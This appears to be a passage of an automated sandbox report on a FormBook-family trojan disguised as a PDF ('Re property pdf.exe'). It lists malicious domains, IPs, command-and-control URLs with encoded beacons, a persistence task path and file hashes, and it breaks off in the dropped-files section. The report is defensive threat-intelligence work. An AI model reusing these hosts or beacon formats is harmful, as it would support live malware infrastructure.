              cortesads.net
              		3.33.130.190
              		truetrue
                		unknown
                www.setsea.info
                		203.161.41.204
                		truetrue
                  		unknown
                  www.662-home-nb.shop
                  		199.59.243.227
                  		truetrue
                    		unknown
                    b1-3-r111.kunlundns.top
                    		129.226.56.200
                    		truetrue
                      		unknown
                      bidiez.com
                      		3.33.130.190
                      		truetrue
                        		unknown
                        www.cqghwamc.top
                        		221.128.225.57
                        		truetrue
                          		unknown
                          whiterabbitgroup.pro
                          		3.33.130.190
                          		truetrue
                            		unknown
                            deltastem.net
                            		3.33.130.190
                            		truetrue
                              		unknown
                              rsantos.shop
                              		84.32.84.32
                              		truetrue
                                		unknown
                                kerennih31.click
                                		104.223.44.195
                                		truetrue
                                  		unknown
                                  cablecarrental.net
                                  		3.33.130.190
                                  		truetrue
                                    		unknown
                                    everyone.golf
                                    		3.33.130.190
                                    		truetrue
                                      		unknown
                                      www.hcpf.xyz
                                      		172.67.181.186
                                      		truetrue
                                        		unknown
                                        jsninja.net
                                        		3.33.130.190
                                        		truetrue
                                          		unknown
                                          www.kerennih31.click
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.jsninja.net
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.deltastem.net
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.rsantos.shop
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.cortesads.net
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.bidiez.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.whiterabbitgroup.pro
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.cablecarrental.net
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.everyone.golf
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.dxfwrc2h.sbs
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown

                                                              Contacted URLs

                                                              NameMaliciousAntivirus DetectionReputation
                                                              http://www.cablecarrental.net/zqr8/true
                                                                		unknown
                                                                http://www.setsea.info/w90v/?2BWDG=pxDyyHWOZ6ShkfCEnqNJFogO2iS2H7GTGeagqdlkqhurb1KRhlhkT/xhewcGJOmLLVVpZKefMTitXH9lS8UNo0PZm0vp/3iOIb2YKVi8sc5e3OZy6VAXooU=&wfm=G6oTo8vxtrue
                                                                  		unknown
                                                                  http://www.662-home-nb.shop/axh7/true
                                                                    		unknown
                                                                    http://www.hcpf.xyz/uy9i/?2BWDG=A7IH/mkAt1Xlqot58OI0S8+25JAud1UhEF7OmTb3ULNYiQ53L6C3hDLglTjiGws4A/oSTbY/vB+Y5OcBKWIDb0nFjD7/puJZKInM70o9vL6/qU8mcXMhaE0=&wfm=G6oTo8vxtrue
                                                                      		unknown
                                                                      http://www.bidiez.com/puvv/true
                                                                        		unknown
                                                                        http://www.jsninja.net/a57a/?2BWDG=ufBwFiprob3VF6k6UE1279W30zXHAcoAMQ5DA8EncRwSSdWTAgjp/PT6qbRvKZhyWw7OmhD3dggL59zyh6BsMWoIasJTvdtYPi0tEctyZ7U7D7SOHDVEOnk=&wfm=G6oTo8vxtrue
                                                                          		unknown
                                                                          http://www.cqghwamc.top/90ie/?2BWDG=AFgPY5yU7pWSzToyhb8ap/LyT/DZ/ZjK5Re3S38zcWWIWncLwX1SLyCTcQH6faMmzCRwYrf9WSeYlPfjK7mc/MKG5u8f2O6ThoCO5oN+7y0XqZ+4yAUZ7Sk=&wfm=G6oTo8vxtrue
                                                                            		unknown
                                                                            http://www.cortesads.net/lpx9/?2BWDG=yfrMmnVL9edufzkkV67gQCynHe5+gBIRO00DGxhyT3HPHFaar1P6nPddxxsQoEWGQjZ/tmjPotgApkkCYtaEOgx0Q//NLra/l6H2B8DThfTi+Y2WyOSOvVY=&wfm=G6oTo8vxtrue
                                                                              		unknown
                                                                              http://www.kerennih31.click/czzt/?2BWDG=KAKG4dTjIDwNH0df8gU76RPra4TcXDDcoeBE7DNk+h+PFOgCIDI8J8PfDl8Ob7fEK2PQwbhHJxVFGH/KvrYWkV/dbZ6zqApOmDyx5MnRXvHLaXYjnht+BzI=&wfm=G6oTo8vxtrue
                                                                                		unknown
                                                                                http://www.cablecarrental.net/zqr8/?wfm=G6oTo8vx&2BWDG=eFg3/wX1FEtYOEOO4fQK8DyYn+9t5MnQ8eGMWFr4U+K0Svorcp+hU2bkMlDd81KIhBlHBG6GkgZ398FJiVEbDYmwZdVtcUsewSnSC4COghX7uWVmIVZIHjw=true
                                                                                  		unknown
                                                                                  http://www.662-home-nb.shop/axh7/?2BWDG=GVKSBocRMS2FyqXHPjOj9+OrOzTrYXMr5CJl/TLorgfRhIZbevfCFnb7jtSuw/m1FqikvKjm63UqVHDKIE9/vbA5AM47cN5qZi+S7x4iOYPaiZ0KOepXdRg=&wfm=G6oTo8vxtrue
                                                                                    		unknown
                                                                                    http://www.kerennih31.click/czzt/true
                                                                                      		unknown
                                                                                      http://www.bidiez.com/puvv/?2BWDG=T/LHAG9D/DKJAY4cGgIDBFFZtM7APAzZIDfepGdmMtSSWfF7Llgex9+86BRulJJgtl8XrMP4vqS7406AXnp/ur5mLgtmNl9eCp3snLA44a4sQebgdSQlBLY=&wfm=G6oTo8vxtrue
                                                                                        		unknown
                                                                                        http://www.deltastem.net/tlpb/?2BWDG=OZnoRuv0v/1Z/CA6HO2FEIDEprX/+1BF8Drjd+I5ZVz3FMGcbqM7cMP28c7FY+8MR3FV1C6ikaATRgc5pZIEy8I+zLLxgcbQl7nSgVZzV1ZQYFDgHJWD22o=&wfm=G6oTo8vxtrue
                                                                                          		unknown
                                                                                          http://www.dxfwrc2h.sbs/170y/true
                                                                                            		unknown
                                                                                            http://www.jsninja.net/a57a/true
                                                                                              		unknown
                                                                                              http://www.stopgazviganais.org/9ect/?2BWDG=U/rZoA1baL0SL+0w4EIlW/PNU4WGlNOJMCqR5hBTWTt3GNoAWeGWO/yRUixBoPW1Dvb67sqohAoonSA3rpdCYc2/1Z8mRmloUf5F40vQT8nvaVFEdkWR3Yo=&wfm=G6oTo8vxtrue
                                                                                                		unknown
                                                                                                http://www.hcpf.xyz/uy9i/true
                                                                                                  		unknown
                                                                                                  http://www.cqghwamc.top/90ie/true
                                                                                                    		unknown
                                                                                                    http://www.rsantos.shop/314m/true
                                                                                                      		unknown
                                                                                                      http://www.whiterabbitgroup.pro/o6ua/?wfm=G6oTo8vx&2BWDG=PtkUewcqXhXGGI7VMrya73N+Qsazq4YwnB9JayH4Wx/cNc5hllniCA+e9SSCe0uJ5GQ5bYdUyDtJB9Y3dlvxJqubD8cdfqbVHrRmeQrxGVujTIKJZNnfFV0=true
                                                                                                        		unknown
                                                                                                        http://www.deltastem.net/tlpb/true
                                                                                                          		unknown
                                                                                                          http://www.rsantos.shop/314m/?wfm=G6oTo8vx&2BWDG=/nEoHfYmGWKhq8vFGRFNK+CuQmseJQPwD7+4RgKMnEs9pXqONJL1vWb6ndeJft1RBApaVMH9KNEUZDtJl+3Iba72QDspFCGFBwch41sSsFCGmhRE7+Dvvlc=true
                                                                                                            		unknown
                                                                                                            http://www.whiterabbitgroup.pro/o6ua/true
                                                                                                              		unknown
                                                                                                              http://www.setsea.info/w90v/true
                                                                                                                		unknown
                                                                                                                http://www.stopgazviganais.org/9ect/true
                                                                                                                  		unknown

                                                                                                                  URLs from Memory and Binaries

                                                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                  http://www.fontbureau.com/designersGRe property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://www.fontbureau.com/designers/?Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://www.founder.com.cn/cn/bTheRe property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://www.fontbureau.com/designers?Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://www.tiro.comRe property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://www.mothersalwaysright.com/9ect/?2BWDG=U/rZoA1baL0SLuGMCFMVqKoR.exe, 00000010.00000002.4213103511.00000000043D2000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000011.00000002.4215978821.00000000060D2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://www.fontbureau.com/designersRe property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://www.goodfont.co.krRe property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://www.sajatypeworks.comRe property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://www.typography.netDRe property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://www.google.comuGMCFMVqKoR.exe, 00000010.00000002.4213103511.0000000004240000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000011.00000002.4215978821.0000000005F40000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://www.founder.com.cn/cn/cTheRe property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.galapagosdesign.com/staff/dennis.htmRe property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.galapagosdesign.com/DPleaseRe property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.fonts.comRe property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.sandoll.co.krRe property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssuGMCFMVqKoR.exe, 00000010.00000002.4213103511.0000000003D8A000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000011.00000002.4215978821.0000000005A8A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        http://www.urwpp.deDPleaseRe property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://www.zhongyicts.com.cnRe property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRe property pdf.exe, 00000000.00000002.1790854732.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, hwOHPmqcegxcxb.exe, 00000007.00000002.2009081564.0000000002D97000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://www.sakkal.comRe property pdf.exe, 00000000.00000002.1794226232.0000000005664000.00000004.00000020.00020000.00000000.sdmp, Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://www.apache.org/licenses/LICENSE-2.0Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://www.fontbureau.comRe property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://www.jsninja.netuGMCFMVqKoR.exe, 00000010.00000002.4215060092.00000000059B9000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            http://www.carterandcone.comlRe property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://www.fontbureau.com/designers/cabarga.htmlNRe property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://www.founder.com.cn/cnRe property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://www.fontbureau.com/designers/frere-user.htmlRe property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://www.jiyu-kobo.co.jp/Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://www.fontbureau.com/designers8Re property pdf.exe, 00000000.00000002.1794367191.0000000006EA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown

                                                                                                                            World Map of Contacted IPs

                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs

                                                                                                                            Public IPs

                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            104.223.44.195
                                                                                                                            		kerennih31.clickUnited States
                                                                                                                            		8100ASN-QUADRANET-GLOBALUStrue
                                                                                                                            172.67.181.186
                                                                                                                            		www.hcpf.xyzUnited States
                                                                                                                            		13335CLOUDFLARENETUStrue
                                                                                                                            221.128.225.57
                                                                                                                            		www.cqghwamc.topChina
                                                                                                                            		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNtrue
                                                                                                                            172.67.196.90
                                                                                                                            		www.stopgazviganais.orgUnited States
                                                                                                                            		13335CLOUDFLARENETUStrue
                                                                                                                            129.226.56.200
                                                                                                                            		b1-3-r111.kunlundns.topSingapore
                                                                                                                            		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNtrue
                                                                                                                            199.59.243.227
                                                                                                                            		www.662-home-nb.shopUnited States
                                                                                                                            		395082BODIS-NJUStrue
                                                                                                                            203.161.41.204
                                                                                                                            		www.setsea.infoMalaysia
                                                                                                                            		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                                                            84.32.84.32
                                                                                                                            		rsantos.shopLithuania
                                                                                                                            		33922NTT-LT-ASLTtrue
                                                                                                                            3.33.130.190
                                                                                                                            		cortesads.netUnited States
                                                                                                                            		8987AMAZONEXPANSIONGBtrue

                                                                                                                            General Information

                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                            Analysis ID:1537675
                                                                                                                            Start date and time:2024-10-19 12:55:09 +02:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 11m 18s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:19
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:1
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample name:Re property pdf.exe
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@22/12@15/9
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 92%
                                                                                                                            • Number of executed functions: 74
                                                                                                                            • Number of non-executed functions: 264
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                            Warnings

                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            • VT rate limit hit for: Re property pdf.exe

                                                                                                                            Simulations

                                                                                                                            Behavior and APIs

                                                                                                                            TimeTypeDescription
                                                                                                                            06:56:08API Interceptor2x Sleep call for process: Re property pdf.exe modified
                                                                                                                            06:56:10API Interceptor18x Sleep call for process: powershell.exe modified
                                                                                                                            06:56:13API Interceptor2x Sleep call for process: hwOHPmqcegxcxb.exe modified
                                                                                                                            06:57:26API Interceptor10142781x Sleep call for process: PresentationHost.exe modified
                                                                                                                            11:56:10Task SchedulerRun new task: hwOHPmqcegxcxb path: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe

                                                                                                                            Joe Sandbox View / Context

                                                                                                                            IPs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            104.223.44.195z7N__MERODEORDENDECOMPRANO8478PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.kerennih31.click/czzt/
                                                                                                                            rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • www.kerennih31.click/195u/
                                                                                                                            221.128.225.57NARLOG 08.10.2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.cqghwamc.top/su8x/
                                                                                                                            P030092024LANDWAY.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.cqghwamc.top/84h5/
                                                                                                                            199.59.243.227#U8a02#U55ae#U63cf#U8ff0.vbsGet hashmaliciousFormBookBrowse
                                                                                                                            • www.notepad.mobi/4q0m/
                                                                                                                            jOAcln1aPL.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • hb-drye.com/cpanel/panel/uploads/Jpnisg.pdf
                                                                                                                            jOAcln1aPL.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • hb-drye.com/cpanel/panel/uploads/Jpnisg.pdf
                                                                                                                            890927362736.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                            • www.virtu.industries/i9b0/
                                                                                                                            na.htaGet hashmaliciousCobalt Strike, FormBook, GuLoaderBrowse
                                                                                                                            • www.forklift-jobs883.click/l9yc/
                                                                                                                            OVERDUE BALANCE.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.9net88.net/ge07/?1b=W4883DLpI&v6A=rInKjcPO3O96ojanc4NFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22tP8faITl6ID
                                                                                                                            http://msnnss001.vastserve.com/Get hashmaliciousUnknownBrowse
                                                                                                                            • msnnss001.vastserve.com/_tr
                                                                                                                            PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.donante-de-ovulos.biz/8lrv/
                                                                                                                            Price Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.personal-loans-jp8.xyz/slxf/
                                                                                                                            PR. No.1599-Rev.2.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • www.adsdomain-195.click/ebca/

                                                                                                                            Domains

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            www.hcpf.xyzz7N__MERODEORDENDECOMPRANO8478PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 104.21.48.76
                                                                                                                            Products Order Catalogs20242.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 104.21.48.76
                                                                                                                            www.cqghwamc.topNARLOG 08.10.2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 221.128.225.57
                                                                                                                            P030092024LANDWAY.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 221.128.225.57
                                                                                                                            www.setsea.infoz7N__MERODEORDENDECOMPRANO8478PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 203.161.41.204

                                                                                                                            ASNs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            CHINA169-BACKBONECHINAUNICOMChina169BackboneCNla.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 39.65.207.167
                                                                                                                            la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 119.53.167.219
                                                                                                                            la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 58.23.226.155
                                                                                                                            la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 101.19.247.249
                                                                                                                            la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 221.200.182.100
                                                                                                                            la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 153.99.176.204
                                                                                                                            la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 27.221.63.25
                                                                                                                            arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 182.115.97.111
                                                                                                                            sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 60.20.54.121
                                                                                                                            la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 113.4.58.64
                                                                                                                            CLOUDFLARENETUSbat2.batGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            PROFOMA INVOICE 90021144577.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            ufW7CDPEZ5.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            BcsUcRnDGx.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            41PbtwTtt7.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            f7goD45EHo.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            W4x0CDQAiw.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            oP7CbGHVDZ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            f4Ghw1L3EH.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            4pzJGIIsej.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            CLOUDFLARENETUSbat2.batGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            PROFOMA INVOICE 90021144577.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            ufW7CDPEZ5.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            BcsUcRnDGx.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            41PbtwTtt7.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            f7goD45EHo.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            W4x0CDQAiw.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            oP7CbGHVDZ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            f4Ghw1L3EH.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            4pzJGIIsej.lnkGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            ASN-QUADRANET-GLOBALUSrSolicita____odeCota____o.exeGet hashmaliciousXWormBrowse
                                                                                                                            • 104.223.35.76
                                                                                                                            z7N__MERODEORDENDECOMPRANO8478PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 104.223.44.195
                                                                                                                            mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 45.199.228.228
                                                                                                                            i686.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 45.199.228.212
                                                                                                                            Q6gqt5HiOS.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 107.150.15.116
                                                                                                                            AkFRdvLzaO.exeGet hashmaliciousXWormBrowse
                                                                                                                            • 107.150.23.154
                                                                                                                            na.htaGet hashmaliciousXWormBrowse
                                                                                                                            • 107.150.23.154
                                                                                                                            KULI500796821_PO20000003.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                            • 185.174.101.218
                                                                                                                            S_code_runner.ps1Get hashmaliciousUnknownBrowse
                                                                                                                            • 192.52.166.186
                                                                                                                            RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 66.63.166.194

                                                                                                                            JA3 Fingerprints

                                                                                                                            No context

                                                                                                                            Dropped Files

                                                                                                                            No context

                                                                                                                            Created / dropped Files

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Re property pdf.exe.log

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\Re property pdf.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1216
                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                            Malicious:true
                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hwOHPmqcegxcxb.exe.log

                                                                                                                            Download File
